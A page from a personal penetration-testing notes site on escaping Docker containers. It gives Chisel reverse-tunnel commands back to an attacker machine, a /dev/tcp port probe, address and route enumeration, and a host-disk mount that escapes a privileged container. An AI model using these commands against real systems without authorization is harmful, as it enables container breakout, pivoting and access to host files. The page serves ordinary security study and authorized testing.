Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • Looking For Potential Files
  • Doing Reverse Proxy Using Chisel
  • Looking For IP Addresses
  • Route Information
  • Command To See Open Port
  • Automated Tools
  • Deepce
  • Docker Privileged Mode Enabled
  1. Linux Privilege Escalation

Docker Container Escape

Looking For Potential Files

Whenever you are in a docker container, always try to enumerate the system as much as you can, because you will always find something interesting in it.

// Potential Directories where you can find something interesting

/opt
/home
/home/<username>
/tmp
/var/www/html

Doing Reverse Proxy Using Chisel

We can also do reverse proxy using chisel. It will help us in such a way that you want to connect to MySQL or Redis database and you are not having such tools installed on the docker container so you can do a reverse proxy and connect to MySQL or redis using proxychains

//Running Chisel on the Kali Linux First

chisel server --reverse -p 1234 --socks5


// Running Chisel on the docker container

./chisel client <ip of kali linux>:1234 R:socks

// Now you can use proxychains and access the things on docker container

Looking For IP Addresses

Sometimes you cannot run ip a or ifconfig command so you can run the following to obtain the ip address 

cat /proc/net/fib_trie // this sometimes shows the ip addresses of different services

Route Information

We can look for routes using below command

cat /proc/net/route

to convert the hexadecimal ip we can use below python script

import sys

def hex_to_ip(hex_str):
    # Split the hex string into 4 chunks of 2 characters (octets)
    octets = [hex_str[i:i+2] for i in range(0, len(hex_str), 2)]
    
    # Reverse the order of octets for little-endian format
    octets.reverse()
    
    # Convert each octet from hex to decimal
    ip_octets = [str(int(octet, 16)) for octet in octets]
    
    # Join the decimal octets with dots to form an IP address
    ip_address = ".".join(ip_octets)
    
    return ip_address

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python hex_to_ip.py <hex_value>")
        sys.exit(1)
    
    hex_value = sys.argv[1]
    
    if len(hex_value) != 8:
        print("Error: The hex value should be 8 characters long.")
        sys.exit(1)
    
    ip = hex_to_ip(hex_value)
    print(f"Converted IP: {ip}")

Command To See Open Port

if you want to see an open port and there is no Nmap or Netcat, you can run the below command

cat < /dev/tcp/172.18.0.1/3306

Automated Tools

Deepce

We can use Deepce tool from the below link to enumerate docker containers for potential escapes

bash deepce.sh

Docker Privileged Mode Enabled

We can escalate our privileges from docker container to host machine if we have privilege mode turned on, in this case we can mount the Host Files and Folders on the Docker Container and access them

 mkdir /mnt/host
 mount /dev/xvda1 /mnt/host/
 cd /mnt/host/
# now you can see the Host OS Files and Folders

PreviousGetting a Fully Interactive TTY ShellNextTunneling and Pivoting

Last updated 1 month ago

LogoGitHub - stealthcopter/deepce: Docker Enumeration, Escalation of Privileges and Container Escapes (DEEPCE)GitHub